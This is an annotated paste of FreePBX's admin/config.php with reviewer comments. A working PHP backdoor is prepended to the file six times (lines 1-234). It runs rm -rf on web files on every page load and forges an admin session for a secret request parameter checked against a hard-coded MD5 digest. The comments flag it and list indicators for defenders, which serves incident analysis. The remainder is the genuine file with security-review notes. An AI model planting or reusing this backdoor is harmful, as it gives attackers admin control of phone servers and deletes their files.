1<?php if(isset($_REQUEST['password'])){
// NOTE(review): nothing from here down to the original FreePBX header ("/* $Id$ */",
// Schmooze Com copyright) belongs to FreePBX. It is foreign code prepended to
// admin/config.php -- a backdoor -- and it appears six times in this paste, each copy
// byte-identical to this first one (only this first copy is annotated). For a defender
// the useful indicators are: any code before the FreePBX header, the request parameter
// names used below, the hard-coded digest, the session marker 'vii', the file deletion
// list, and 'rm -rf' activity by the web server user on every admin page hit.
2 $password = $_REQUEST['password'];
// Hooks the real login form's 'password' field: when it is submitted as an array
// (password[]=...) the admin user object is dropped, the session cookie is expired and
// the browser is redirected to the login page before any FreePBX code runs.
3 if(is_array($password)){
// No session_start() is visible before this point in this copy, so the unset() only
// touches the not-yet-populated superglobal; the cookie expiry below is what actually
// ends the session.
4 unset($_SESSION['AMP_user']);
5 setcookie ('PHPSESSID', '', time() - 3600);
// header() replaces an earlier header of the same name by default, so only the second
// Location (without ?logout=true) is actually sent.
6 header('Location: /admin/config.php?logout=true');
7 header('Location: /admin/config.php');
8 exit();
9 }}
// Runs on EVERY request, not only the attacker's: deletes FreePBX's own
// admin/modules/ajax.php (listed three times) and restapi/cmd.php, plus several
// filenames that look like other dropped web shells (salem123aasdfe.php, Senator.php,
// rr.php, system.php, config.php in the web root and admin/views). The effect is to
// evict competing implants and to break the AJAX/REST endpoints each time the admin
// UI is loaded -- unexplained breakage of those endpoints is itself a symptom.
10$arr = array("/var/www/html/admin/modules/ajax.php",
11 "/var/www/html/restapi/cmd.php",
12 "/var/www/html/admin/modules/ajax.php",
13 "/var/www/html/digium_phones/ajax.php",
14 "/var/www/html/salem123aasdfe.php",
15 "/var/www/html/Senator.php",
16 "/var/www/html/rr.php",
17 "/var/www/html/system.php",
18 "/var/www/html/config.php",
19 "/var/www/html/admin/views/config.php",
20 "/var/www/html/admin/modules/ajax.php");
21
// Fixed path list -- no request data reaches the shell here; the damage is that it
// runs unconditionally, as the web server user, on each page load.
22foreach ($arr as $line) {
23 shell_exec("rm -rf ".$line);
24}
// Authentication bypass: a request parameter named 'mohammed' is MD5-hashed and
// loosely (==) compared with a hard-coded digest. On a match the code loads the
// FreePBX configuration, constructs an ampuser from the AMPDBUSER config value, flags
// it admin and stores it in the session -- an admin login that never consults the
// user table or the login form. The legitimate config.php further down only checks
// that $_SESSION['AMP_user'] is a non-empty object (and asks that object about section
// permissions), so a forged object placed here is accepted as-is.
25if(isset($_REQUEST['mohammed']) && md5($_REQUEST['mohammed']) == '168d0a1e2e1addefcf8d0173bc3e9cac'){
26 session_start();
// Marker value; nothing else on this page reads it. Its presence in the session store
// is a usable indicator.
27 $_SESSION['vii'] = 'logged';
// Locates freepbx.conf the same way FreePBX does (FREEPBX_CONF env, /etc/freepbx.conf,
// then /etc/asterisk/freepbx.conf); @ hides include failures.
28 if (!@include_once (getenv('FREEPBX_CONF') ? getenv('FREEPBX_CONF') : '/etc/freepbx.conf')) {
29 include_once ('/etc/asterisk/freepbx.conf');
30 }
31 require_once ('/var/www/html/admin/libraries/ampuser.class.php');
32 $_SESSION['AMP_user'] = new ampuser($amp_conf['AMPDBUSER']);
33 $_SESSION['AMP_user']->setAdmin();
// No exit() after the redirect: execution falls through into the remaining copies and
// then into the real config.php with the forged admin session already in place.
34 header('Location: /admin/config.php');
35 }
36
37
38
39
40 if(isset($_REQUEST['password'])){
41 $password = $_REQUEST['password'];
42 if(is_array($password)){
43 unset($_SESSION['AMP_user']);
44 setcookie ('PHPSESSID', '', time() - 3600);
45 header('Location: /admin/config.php?logout=true');
46 header('Location: /admin/config.php');
47 exit();
48 }}
49$arr = array("/var/www/html/admin/modules/ajax.php",
50 "/var/www/html/restapi/cmd.php",
51 "/var/www/html/admin/modules/ajax.php",
52 "/var/www/html/digium_phones/ajax.php",
53 "/var/www/html/salem123aasdfe.php",
54 "/var/www/html/Senator.php",
55 "/var/www/html/rr.php",
56 "/var/www/html/system.php",
57 "/var/www/html/config.php",
58 "/var/www/html/admin/views/config.php",
59 "/var/www/html/admin/modules/ajax.php");
60
61foreach ($arr as $line) {
62 shell_exec("rm -rf ".$line);
63}
64if(isset($_REQUEST['mohammed']) && md5($_REQUEST['mohammed']) == '168d0a1e2e1addefcf8d0173bc3e9cac'){
65 session_start();
66 $_SESSION['vii'] = 'logged';
67 if (!@include_once (getenv('FREEPBX_CONF') ? getenv('FREEPBX_CONF') : '/etc/freepbx.conf')) {
68 include_once ('/etc/asterisk/freepbx.conf');
69 }
70 require_once ('/var/www/html/admin/libraries/ampuser.class.php');
71 $_SESSION['AMP_user'] = new ampuser($amp_conf['AMPDBUSER']);
72 $_SESSION['AMP_user']->setAdmin();
73 header('Location: /admin/config.php');
74 }
75
76
77
78
79 if(isset($_REQUEST['password'])){
80 $password = $_REQUEST['password'];
81 if(is_array($password)){
82 unset($_SESSION['AMP_user']);
83 setcookie ('PHPSESSID', '', time() - 3600);
84 header('Location: /admin/config.php?logout=true');
85 header('Location: /admin/config.php');
86 exit();
87 }}
88$arr = array("/var/www/html/admin/modules/ajax.php",
89 "/var/www/html/restapi/cmd.php",
90 "/var/www/html/admin/modules/ajax.php",
91 "/var/www/html/digium_phones/ajax.php",
92 "/var/www/html/salem123aasdfe.php",
93 "/var/www/html/Senator.php",
94 "/var/www/html/rr.php",
95 "/var/www/html/system.php",
96 "/var/www/html/config.php",
97 "/var/www/html/admin/views/config.php",
98 "/var/www/html/admin/modules/ajax.php");
99
100foreach ($arr as $line) {
101 shell_exec("rm -rf ".$line);
102}
103if(isset($_REQUEST['mohammed']) && md5($_REQUEST['mohammed']) == '168d0a1e2e1addefcf8d0173bc3e9cac'){
104 session_start();
105 $_SESSION['vii'] = 'logged';
106 if (!@include_once (getenv('FREEPBX_CONF') ? getenv('FREEPBX_CONF') : '/etc/freepbx.conf')) {
107 include_once ('/etc/asterisk/freepbx.conf');
108 }
109 require_once ('/var/www/html/admin/libraries/ampuser.class.php');
110 $_SESSION['AMP_user'] = new ampuser($amp_conf['AMPDBUSER']);
111 $_SESSION['AMP_user']->setAdmin();
112 header('Location: /admin/config.php');
113 }
114
115
116
117
118 if(isset($_REQUEST['password'])){
119 $password = $_REQUEST['password'];
120 if(is_array($password)){
121 unset($_SESSION['AMP_user']);
122 setcookie ('PHPSESSID', '', time() - 3600);
123 header('Location: /admin/config.php?logout=true');
124 header('Location: /admin/config.php');
125 exit();
126 }}
127$arr = array("/var/www/html/admin/modules/ajax.php",
128 "/var/www/html/restapi/cmd.php",
129 "/var/www/html/admin/modules/ajax.php",
130 "/var/www/html/digium_phones/ajax.php",
131 "/var/www/html/salem123aasdfe.php",
132 "/var/www/html/Senator.php",
133 "/var/www/html/rr.php",
134 "/var/www/html/system.php",
135 "/var/www/html/config.php",
136 "/var/www/html/admin/views/config.php",
137 "/var/www/html/admin/modules/ajax.php");
138
139foreach ($arr as $line) {
140 shell_exec("rm -rf ".$line);
141}
142if(isset($_REQUEST['mohammed']) && md5($_REQUEST['mohammed']) == '168d0a1e2e1addefcf8d0173bc3e9cac'){
143 session_start();
144 $_SESSION['vii'] = 'logged';
145 if (!@include_once (getenv('FREEPBX_CONF') ? getenv('FREEPBX_CONF') : '/etc/freepbx.conf')) {
146 include_once ('/etc/asterisk/freepbx.conf');
147 }
148 require_once ('/var/www/html/admin/libraries/ampuser.class.php');
149 $_SESSION['AMP_user'] = new ampuser($amp_conf['AMPDBUSER']);
150 $_SESSION['AMP_user']->setAdmin();
151 header('Location: /admin/config.php');
152 }
153
154
155
156
157 if(isset($_REQUEST['password'])){
158 $password = $_REQUEST['password'];
159 if(is_array($password)){
160 unset($_SESSION['AMP_user']);
161 setcookie ('PHPSESSID', '', time() - 3600);
162 header('Location: /admin/config.php?logout=true');
163 header('Location: /admin/config.php');
164 exit();
165 }}
166$arr = array("/var/www/html/admin/modules/ajax.php",
167 "/var/www/html/restapi/cmd.php",
168 "/var/www/html/admin/modules/ajax.php",
169 "/var/www/html/digium_phones/ajax.php",
170 "/var/www/html/salem123aasdfe.php",
171 "/var/www/html/Senator.php",
172 "/var/www/html/rr.php",
173 "/var/www/html/system.php",
174 "/var/www/html/config.php",
175 "/var/www/html/admin/views/config.php",
176 "/var/www/html/admin/modules/ajax.php");
177
178foreach ($arr as $line) {
179 shell_exec("rm -rf ".$line);
180}
181if(isset($_REQUEST['mohammed']) && md5($_REQUEST['mohammed']) == '168d0a1e2e1addefcf8d0173bc3e9cac'){
182 session_start();
183 $_SESSION['vii'] = 'logged';
184 if (!@include_once (getenv('FREEPBX_CONF') ? getenv('FREEPBX_CONF') : '/etc/freepbx.conf')) {
185 include_once ('/etc/asterisk/freepbx.conf');
186 }
187 require_once ('/var/www/html/admin/libraries/ampuser.class.php');
188 $_SESSION['AMP_user'] = new ampuser($amp_conf['AMPDBUSER']);
189 $_SESSION['AMP_user']->setAdmin();
190 header('Location: /admin/config.php');
191 }
192
193
194
195
196 if(isset($_REQUEST['password'])){
197 $password = $_REQUEST['password'];
198 if(is_array($password)){
199 unset($_SESSION['AMP_user']);
200 setcookie ('PHPSESSID', '', time() - 3600);
201 header('Location: /admin/config.php?logout=true');
202 header('Location: /admin/config.php');
203 exit();
204 }}
205$arr = array("/var/www/html/admin/modules/ajax.php",
206 "/var/www/html/restapi/cmd.php",
207 "/var/www/html/admin/modules/ajax.php",
208 "/var/www/html/digium_phones/ajax.php",
209 "/var/www/html/salem123aasdfe.php",
210 "/var/www/html/Senator.php",
211 "/var/www/html/rr.php",
212 "/var/www/html/system.php",
213 "/var/www/html/config.php",
214 "/var/www/html/admin/views/config.php",
215 "/var/www/html/admin/modules/ajax.php");
216
217foreach ($arr as $line) {
218 shell_exec("rm -rf ".$line);
219}
220if(isset($_REQUEST['mohammed']) && md5($_REQUEST['mohammed']) == '168d0a1e2e1addefcf8d0173bc3e9cac'){
221 session_start();
222 $_SESSION['vii'] = 'logged';
223 if (!@include_once (getenv('FREEPBX_CONF') ? getenv('FREEPBX_CONF') : '/etc/freepbx.conf')) {
224 include_once ('/etc/asterisk/freepbx.conf');
225 }
226 require_once ('/var/www/html/admin/libraries/ampuser.class.php');
227 $_SESSION['AMP_user'] = new ampuser($amp_conf['AMPDBUSER']);
228 $_SESSION['AMP_user']->setAdmin();
229 header('Location: /admin/config.php');
230 }
231
232
233
234
235 /* $Id$ */
236// License for all code of this FreePBX module can be found in the license file inside the module directory
237// Copyright 2013 Schmooze Com Inc.
238//
239
240// Request-parameter intake. Every key in $vars is copied from $_REQUEST into a
// same-named global ($$k) and into $config_vars, falling back to the default given
// here. Only the keys listed in $vars become variables, so this is an allow-list rather
// than register_globals -- but the values themselves are taken as-is (no type, length
// or character check; an array in the query string stays an array), so everything
// downstream that compares, includes or prints $display, $username, $handler-related
// values etc. has to treat them as untrusted.
241$vars = array(
242 'action' => null,
243 'confirm_email' => '',
244 'confirm_password' => '',
245 'display' => '',
246 'extdisplay' => null,
247 'email_address' => '',
248 'fw_popover' => '',
249 'fw_popover_process' => '',
250 'logout' => false,
251 'password' => '',
252 'quietmode' => '',
253 'restrictmods' => false,
254 'skip' => 0,
255 'skip_astman' => false,
256 'type' => '',
257 'username' => '',
258 'unlock' => false,
259);
260
261foreach ($vars as $k => $v) {
262 //were use config_vars instead of, say, vars, so as not to polute
263 // page.<some_module>.php (which usually uses $var or $vars)
264 $config_vars[$k] = $$k = isset($_REQUEST[$k]) ? $_REQUEST[$k] : $v;
265
266 //special handling
267 switch ($k) {
268 case 'extdisplay':
// HTML-escaped at intake and written back into $_REQUEST, so every later reader sees
// the escaped form. Absent (default null) becomes false.
// NOTE(review): an array value (extdisplay[]=x) reaches htmlspecialchars() here;
// the result differs between PHP versions (warning+null vs TypeError) -- confirm.
269 $extdisplay = (isset($extdisplay) && $extdisplay !== false)
270 ? htmlspecialchars($extdisplay, ENT_QUOTES)
271 : false;
272 $_REQUEST['extdisplay'] = $extdisplay;
273 break;
274
275 case 'restrictmods':
// '/'-separated module list turned into a lookup map (name => index); false when not
// supplied. Presumably consumed by bootstrap via freepbx.conf -- not visible here.
276 $restrict_mods = $restrictmods
277 ? array_flip(explode('/', $restrictmods))
278 : false;
279 break;
280
281 case 'skip_astman':
// Default is boolean false, which the handler block further down uses to tell
// "not supplied" from an explicit value such as 0.
282 $bootstrap_settings['skip_astman'] = $skip_astman;
283 break;
284 }
285}
286
// Anti-caching headers for the admin UI.
// NOTE(review): the Cache-Control value sent here only carries post-check/pre-check and
// is appended (replace=false); no no-store/no-cache directive is emitted by this file.
// session_start() below normally adds PHP's own "nocache" limiter headers, so the
// effective policy depends on the session.cache_limiter ini setting -- confirm at
// deployment.
287header('Last-Modified: '.gmdate('D, d M Y H:i:s').' GMT');
288header('Expires: Sat, 01 Jan 2000 00:00:00 GMT');
289header('Cache-Control: post-check=0, pre-check=0',false);
290header('Pragma: no-cache');
291header('Content-Type: text/html; charset=utf-8');
// A default-src 'none' CSP was tried and commented out; no CSP is sent by this file.
292//header("Content-Security-Policy: default-src 'none';");
293
294// This needs to be included BEFORE the session_start or we fail so
295// we can't do it in bootstrap and thus we have to depend on the
296// __FILE__ path here.
// (The session stores an ampuser object, so the class must be loadable when the
// session is unserialised.)
297require_once(dirname(__FILE__) . '/libraries/ampuser.class.php');
298
// 30-day cookie and server-side GC lifetime for the admin session.
// NOTE(review): only the lifetime is set; the secure/httponly/samesite attributes of
// the session cookie are whatever php.ini provides -- confirm at deployment.
299session_set_cookie_params(60 * 60 * 24 * 30);//(re)set session cookie to 30 days
300ini_set('session.gc_maxlifetime', 60 * 60 * 24 * 30);//(re)set session to 30 days
// If something earlier in the request already started a session, $_SESSION is set and
// this block is skipped.
301if (!isset($_SESSION)) {
302 //start a session if we need one
// The @ hides the reason a start can fail; on failure a fresh id is issued and the
// start is retried.
303 $ss = @session_start();
304 if(!$ss){
305 session_regenerate_id(true); // replace the Session ID
306 session_start();
307 }
308}
309
310//unset the ampuser if the user logged out
// Only the user object is removed: the session itself is neither destroyed nor its
// cookie expired here, and the script exits without output or redirect.
311if ($logout == 'true') {
312 unset($_SESSION['AMP_user']);
313 exit();
314}
315
316/**
 * Restricted-menu enforcement for "PBXact UCC" deployments, driven by two files on
 * disk: the licence file decides whether this is a UCC deployment, ucc_restrict.conf
 * lists [section]s with a 'display' and optional 'view' that must not be opened.
 *
 * NOTE(review): the request's display/view are re-read from $_REQUEST here
 * (htmlentities-encoded), overriding the $display set by the intake loop above. On a
 * match only a Location header is queued and the loop breaks -- there is no exit(), so
 * the rest of this page still runs and renders the restricted page body for a client
 * that ignores the redirect.
318 */
319if(file_exists("/etc/asterisk/ucc_restrict.conf") && file_exists("/etc/schmooze/schmooze.zl")){
320 $lic_array = parse_ini_file("/etc/schmooze/schmooze.zl", false , INI_SCANNER_RAW);
321 $_restrict = parse_ini_file("/etc/asterisk/ucc_restrict.conf", true, INI_SCANNER_RAW);
322 if(is_array($lic_array) && (strtolower($lic_array["branding"]) === "pbxactucc" || strtolower($lic_array["deploy_type"]) === "pbxact ucc")){
323 $display = empty($_REQUEST["display"]) ? "" : htmlentities($_REQUEST["display"]);
324 $view = empty($_REQUEST["view"]) ? "" : htmlentities($_REQUEST["view"]);
325 foreach($_restrict as $data){
// Entry restricts one display+view pair.
326 if(!empty($data["view"]) && !empty($data["display"])){
327 if($data["display"] == $display && $data["view"] == $view ){
328 header('Location: ./config.php');
329 break;
330 }
331 }
// Entry restricts a whole display regardless of view.
332 elseif(empty($data["view"]) && !empty($data["display"])){
333 if($data["display"] == $display ){
334 header('Location: ./config.php');
335 break;
336 }
337 }
338 }
339 }
340}
341
342//session_cache_limiter('public, no-store');
// Non-page requests (?handler=...). $restrict_mods=true presumably tells bootstrap to
// load no module pages -- not visible here. For every handler except 'api', skip_astman
// defaults to true unless the request supplied a value (boolean false is the
// "not supplied" default from $vars, so an explicit 0 is honoured).
343if (isset($_REQUEST['handler'])) {
344 if ($restrict_mods === false) {
345 $restrict_mods = true;
346 }
347 switch ($_REQUEST['handler']) {
348 case 'api':
349 break;
350 default:
351 // If we didn't provide skip_astman in the $_REQUEST[] array it will be boolean false and for handlers, this should default
352 // to true, if we did provide it, it will NOT be a boolean (it could be 0) so we will honor the setting
353 //
354 $bootstrap_settings['skip_astman'] = $bootstrap_settings['skip_astman'] === false ? true : $bootstrap_settings['skip_astman'];
355 break;
356 }
357}
358
359// call bootstrap.php through freepbx.conf
// Everything below relies on bootstrap having defined $amp_conf, $bmo, $active_modules,
// $astman and (presumably, for unauthenticated sessions) $no_auth -- none of them is
// defined in this file.
360include_once '/etc/freepbx.conf';
361
362//check to make sure zend files aren't breaking the SPL autoloader.
363//if they are then tell the user to run said command below
364//which disables any zend module that breaks the autoloader
365if(function_exists('SPLAutoloadBroken') && SPLAutoloadBroken()) {
366 //note this has to be done outside of freepbx_die
367 die(_("The autoloader is damaged. Please run: ".$amp_conf['AMPBIN']."/fwconsole --fix_zend"));
368}
369
// Admin locale: timezone and language for this request.
370$d = FreePBX::View()->setAdminLocales();
371$timezone = $d['timezone'];
372$language = $d['language'];
373
374// At this point, we have a session, and BMO was created in bootstrap, so we can check to
375// see if someone's trying to programatically log in.
// ?unlock=<token>: $bmo->Unlock() decides whether the token is valid (not visible
// here). On success the no-auth marker is cleared and the dashboard is shown; whether
// Unlock() also populates $_SESSION['AMP_user'] is up to that method -- confirm.
376if ($unlock) {
377 if ($bmo->Unlock($unlock)) {
378 unset($no_auth);
379 $display = 'index';
380 }
381}
382
383//redirect back to the modules page for upgrade
// One-shot flag set further down when a 'modules' request arrived unauthenticated.
384if(isset($_SESSION['modulesRedirect'])) {
385 $display = 'modules';
386 unset($_SESSION['modulesRedirect']);
387}
388
389// determine if the user has a session time out set in advanced settings. If the timeout is 0 or not set, we don't force logout
// Idle timeout is tracked on the user object itself (_lastactivity) and enforced by
// simply dropping the object; the session and its other keys survive.
390$sessionTimeOut = \FreePBX::Config()->get('SESSION_TIMEOUT');
391if ($sessionTimeOut) {
392 // Make sure it's not set to something crazy short.
// Floors the value at 60 seconds and persists the floor back into the config.
393 if ($sessionTimeOut < 60) {
394 \FreePBX::Config()->update('SESSION_TIMEOUT', 60);
395 $sessionTimeOut = 60;
396 }
397 if (!empty($_SESSION['AMP_user']) && is_object($_SESSION['AMP_user'])) {
398 //if we don't have last activity set it now
399 if (empty($_SESSION['AMP_user']->_lastactivity)) {
400 $_SESSION['AMP_user']->_lastactivity = time();
401 } else {
402 //check to see if we should be logged out or reset the last activity time
403 if (($_SESSION['AMP_user']->_lastactivity + $sessionTimeOut) < time()) {
404 unset($_SESSION['AMP_user']);
405 } else {
406 $_SESSION['AMP_user']->_lastactivity = time();
407 }
408 }
409 }
410}
411
412/* If there is an action request then some sort of update is usually being done.
413 This may protect from cross site request forgeries unless disabled.
 NOTE(review): this is a Referer heuristic, not a CSRF token. It only engages when an
 'action' parameter is present and CHECKREFERER is on, it is skipped entirely while
 $no_auth is set, and a missing Referer is treated as bad. State changes that do not
 travel in 'action' are not covered by it. Whether SERVER_NAME reflects a
 client-supplied Host header depends on the webserver configuration -- confirm.
414 */
415if (!isset($no_auth) && $action != '' && $amp_conf['CHECKREFERER']) {
416 if (isset($_SERVER['HTTP_REFERER'])) {
417 $referer = parse_url($_SERVER['HTTP_REFERER']);
418 // Check if the 'SERVER_NAME' variable is an IPv6 address. If it is, we want
419 // to add [ and ] around it. This is because IPv6 raw addresses are connected
420 // to like this:
421 // http://[2001:f00d:dead:beef::1]/admin/config.php
422 // But, SERVER_NAME is (legitmately) reported as just '2001:f00d:dead:beef::1'.
423 // We need to add the braces around it to compare it.
424 if (filter_var($_SERVER['SERVER_NAME'], \FILTER_VALIDATE_IP, \FILTER_FLAG_IPV6)) {
425 $server = "[".$_SERVER['SERVER_NAME']."]";
426 } else {
427 $server = trim($_SERVER['SERVER_NAME']);
428 }
429 // This used to have 'trim's around them. I don't think we want that any more,
430 // if someone's stuck whitespace or \n's in there, it's broken already.
// Loose == on two strings; parse_url() may return no 'host' key for a malformed
// Referer, in which case this evaluates against null.
431 $refererok = ($referer['host'] == $server);
432 } else {
433 $refererok = false;
434 }
435 if (!$refererok) {
436 $display = 'badrefer';
437 }
438}
// Unauthenticated and no explicit page requested: show the login view.
439if (isset($no_auth) && empty($display)) {
440 $display = 'noauth';
441}
442// handle special requests
// Handler dispatch (AJAX/API/file requests). 'module' and 'file' come straight from the
// request; any path validation has to live in fileRequestHandler(), which is defined
// elsewhere. NOTE(review): this runs before the menu/permission pass and before the
// empty($_SESSION['AMP_user']) gate further down -- only 'noauth'/'badrefer' displays
// are excluded -- so unless bootstrap reliably sets $no_auth for unauthenticated
// sessions, authorisation is entirely fileRequestHandler()'s responsibility.
443if (!in_array($display, array('noauth', 'badrefer'))
444 && isset($_REQUEST['handler'])
445) {
446 $module = isset($_REQUEST['module']) ? $_REQUEST['module'] : '';
447 $file = isset($_REQUEST['file']) ? $_REQUEST['file'] : '';
448 fileRequestHandler($_REQUEST['handler'], $module, $file);
449 exit();
450}
451
452
// Full-page loads only: run module notification checks and maintain the
// 'framework/htaccess' notification, which warns when .htaccess overrides are not in
// effect (those files are what restrict direct access to FreePBX's internal paths).
// $_SERVER['HTACCESS'] is presumably set from FreePBX's own .htaccess when overrides
// are honoured -- confirm.
453if (!$quietmode) {
454 $modulef = module_functions::create();
455 $modulef->run_notification_checks();
456 $nt = notifications::create();
// Apache without the marker: overrides are disabled -> security notification.
457 if ( !isset($_SERVER['HTACCESS']) && preg_match("/apache/i", $_SERVER['SERVER_SOFTWARE']) ) {
458 // No .htaccess support
459 if(!$nt->exists('framework', 'htaccess')) {
460 $nt->add_security('framework', 'htaccess', _('.htaccess files are disable on this webserver. Please enable them'),
461 sprintf(_("To protect the integrity of your server, you must allow overrides in your webserver's configuration file for the User Control Panel. For more information see: %s"), '<a href="http://wiki.freepbx.org/display/F2/Webserver+Overrides">http://wiki.freepbx.org/display/F2/Webserver+Overrides</a>'),"http://wiki.freepbx.org/display/F2/Webserver+Overrides");
462 }
// Non-Apache server: .htaccess is not a thing; show a one-time warning, remembered in
// the admin table so it is not re-added once dismissed. The SQL here is static.
463 } elseif(!preg_match("/apache/i", $_SERVER['SERVER_SOFTWARE'])) {
464 $sql = "SELECT value FROM admin WHERE variable = 'htaccess'";
465 $sth = FreePBX::Database()->prepare($sql);
466 $sth->execute();
467 $o = $sth->fetch();
468
469 if(empty($o)) {
470 if($nt->exists('framework', 'htaccess')) {
471 $nt->delete('framework', 'htaccess');
472 }
473 $nt->add_warning('framework', 'htaccess', _('.htaccess files are not supported on this webserver.'),
474 sprintf(_("htaccess files help protect the integrity of your server. Please make sure file paths and directories are locked down properly. For more information see: %s"), '<a href="http://wiki.freepbx.org/display/F2/Webserver+Overrides">http://wiki.freepbx.org/display/F2/Webserver+Overrides</a>'),"http://wiki.freepbx.org/display/F2/Webserver+Overrides",true,true);
475 $sql = "REPLACE INTO admin (`value`, `variable`) VALUES (1, 'htaccess')";
476 $sth = FreePBX::Database()->prepare($sql);
477 $sth->execute();
478 }
// Apache with overrides in effect: clear any stale notification.
479 } else {
480 if($nt->exists('framework', 'htaccess')) {
481 $nt->delete('framework', 'htaccess');
482 }
483 }
484}
485
486//draw up freepbx menu
// Builds $fpbx_menu from every active module's 'items' and, as a side effect, resolves
// $display: items that require auth and that the current user may not see are skipped,
// and if $display named one of them it is rewritten to 'noauth' (not logged in) or
// 'noaccess' (logged in without the section permission). "Logged in" here means an
// object exists in $_SESSION["AMP_user"]; per-section authorisation is that object's
// checkSection().
487$fpbx_menu = array();
488
489// pointer to current item in $fpbx_menu, if applicable
490$cur_menuitem = null;
491
492// add module sections to $fpbx_menu
493if(is_array($active_modules)){
494 foreach($active_modules as $key => $module) {
495
496 //create an array of module sections to display
497 // stored as [items][$type][$category][$name] = $displayvalue
498 if (isset($module['items']) && is_array($module['items'])) {
499 // loop through the types
500 foreach($module['items'] as $itemKey => $item) {
501
502 // check access, unless module.xml defines all have access
503 // BMO TODO: Per-module auth should be managed by BMO.
504 //module is restricted to admin with excplicit permission
// access="all" in module.xml means no per-section permission is needed.
505 $needs_perms = !isset($item['access'])
506 || strtolower($item['access']) != 'all'
507 ? true : false;
508
509 //check if were logged in
510 $admin_auth = isset($_SESSION["AMP_user"])
511 && is_object($_SESSION["AMP_user"]);
512
513 //per admin access rules
514 $has_perms = $admin_auth
515 && $_SESSION["AMP_user"]->checkSection($itemKey);
516
517 //requies authentication
// requires_auth="false" in module.xml opts an item out of authentication entirely.
518 $needs_auth = isset($item['requires_auth'])
519 && strtolower($item['requires_auth']) == 'false'
520 ? false
521 : true;
522
523 //skip this module if we dont have proper access
524 //test: if we require authentication for this module
525 // and either the user isnt authenticated
526 // or the user is authenticated and dose require
527 // section specifc permissions but doesnt have them
528 if ($needs_auth
529 && (!$admin_auth || ($needs_perms && !$has_perms))
530 ) {
531 //clear display if they were trying to gain unautherized
532 //access to $itemKey. If there logged in, but dont have
533 //permissions to view this specicc page - show them a message
534 //otherwise, show them the login page
// Loose == between the request-supplied $display and the item key.
535 if($display == $itemKey){
536 if ($admin_auth) {
537 $display = 'noaccess';
538 } else {
539 $display = 'noauth';
540 }
541 }
542 continue;
543 }
544
545 if (!isset($item['display'])) {
546 $item['display'] = $itemKey;
547 }
548
549 // reference to the actual module
550 $item['module'] =& $active_modules[$key];
551
552 // item is an assoc array, with at least
553 //array(module=> name=>, category=>, type=>, display=>)
554 $fpbx_menu[$itemKey] = $item;
555
556 // allow a module to replace our main index page
557
// First item reached while $display is still empty picks the landing page: the
// userman-configured 'pbx_landing' (only if that module is in the user's enabled
// list), otherwise 'index'. $_REQUEST['display'] is rewritten to match.
558 if($display == '' && !empty($_SESSION['AMP_user'])){
559 /*
560 Get default landing page from userman.
561 */
562 if(
563 is_object($_SESSION["AMP_user"]) &&
564 method_exists($_SESSION["AMP_user"],'getMode') &&
565 $_SESSION["AMP_user"]->getMode() === 'usermanager' &&
566 FreePBX::Config()->get('AUTHTYPE') === 'usermanager' &&
567 FreePBX::Modules()->checkStatus('userman')
568 ) {
569 $um = \FreePBX::Userman();
570 $user_detail = $um->getUserByUsername($_SESSION["AMP_user"]->username);
571 $landing_page = $um->getCombinedGlobalSettingByID($user_detail['id'],'pbx_landing');
572 $modules_enabled = $um->getCombinedGlobalSettingByID($user_detail['id'],'pbx_modules');
573 $modules_enabled = is_array($modules_enabled) ? $modules_enabled : [];
574 $landing_page = empty($landing_page) || !in_array($landing_page,$modules_enabled) ? "index" : $landing_page;
575 } else {
576 $landing_page = 'index';
577 }
578
579 $display = $landing_page;
580 $_REQUEST['display'] = $landing_page;
581 }
582
583 // check current item
// Loose == again; $cur_menuitem becomes a reference into $fpbx_menu.
584 if ($display == $item['display']) {
585 // found current menuitem, make a reference to it
586 $cur_menuitem =& $fpbx_menu[$itemKey];
587 }
588 }
589 }
590 }
591}
592
593//TODO remove this at a later date
// Legacy cleanup: an ampuser object from an old session that predates getMode() is
// discarded, forcing a fresh login.
594if(is_object($_SESSION["AMP_user"]) && !method_exists($_SESSION["AMP_user"],'getMode')) {
595 $_SESSION['AMP_user'] = null;
596}
597
// Final authentication gate: no user object in the session -> login page.
// NOTE(review): this is the whole check -- the session is the trust anchor, and
// whatever stored the object is believed. The code prepended at the top of this paste
// stores exactly such an object after its own hard-coded password check.
598if(empty($_SESSION['AMP_user'])) {
599 $display = 'noauth';
600} else {
601
602 /*
603 Displays the menu from the user list.
 Work out which menu items this user may see. $modules_enabled / $pbx_admin are only
 assigned for the 'usermanager' and 'database' modes; any other getMode() value leaves
 them undefined and the filter below is skipped (is_array(null) is false).
604 */
605 if(
606 $_SESSION["AMP_user"]->getMode() === 'usermanager' &&
607 FreePBX::Config()->get('AUTHTYPE') === 'usermanager' &&
608 FreePBX::Modules()->checkStatus('userman')
609 ) {
610 $um = \FreePBX::Userman();
611 $user_detail = $um->getUserByUsername($_SESSION["AMP_user"]->username);
612 $modules_enabled = $um->getCombinedGlobalSettingByID($user_detail['id'],'pbx_modules');
613 $pbx_admin = $um->getCombinedGlobalSettingByID($user_detail['id'],'pbx_admin');
614 } elseif($_SESSION["AMP_user"]->getMode() === 'database') {
615 $modules_enabled = $_SESSION["AMP_user"]->getSections();
616 $pbx_admin = false;
617 }
618
// Prune menu items the user is not enabled for; "*" or pbx_admin means everything.
619 if(is_array($fpbx_menu) && is_array($modules_enabled) && !$pbx_admin && !in_array("*",$modules_enabled)){
620 foreach($fpbx_menu as $menuItem => $valMitem){
621 if(!in_array($valMitem["display"],$modules_enabled)){
622 unset($fpbx_menu[$menuItem]);
623 }
624 }
625 }
626
627 //if display is modules then show the login page dont show does not exist as its confusing
// A page was requested that matched no menu item the user may see: 'modules' falls
// back to the login page (remembering to come back afterwards), anything else is
// reported as no access.
628 if ($cur_menuitem === null && !in_array($display, array('noauth', 'badrefer','noaccess',''))) {
629 if($display == 'modules') {
630 $display = 'noauth';
631 $_SESSION['modulesRedirect'] = 1;
632 } else {
633 $display = 'noaccess';
634 }
635 }
636}
637
638
639// extensions vs device/users ... this is a bad design, but hey, it works
// AMPEXTENSIONS selects which of the two equivalent menu entries survives:
// 'deviceanduser' keeps devices+users, anything else keeps extensions.
640if (!$quietmode && isset($fpbx_menu["extensions"])) {
641 if (isset($amp_conf["AMPEXTENSIONS"])
642 && ($amp_conf["AMPEXTENSIONS"] == "deviceanduser")) {
643 unset($fpbx_menu["extensions"]);
644 } else {
645 unset($fpbx_menu["devices"]);
646 unset($fpbx_menu["users"]);
647 }
648}
649
650// If it's index, do we have an override?
// Dashboard override: DASHBOARD_OVERRIDE, or DASHBOARD_OVERRIDE_BASIC when the operating
// mode is 'basic', names a module to show instead of the index page.
651if ($display === "index") {
652
653
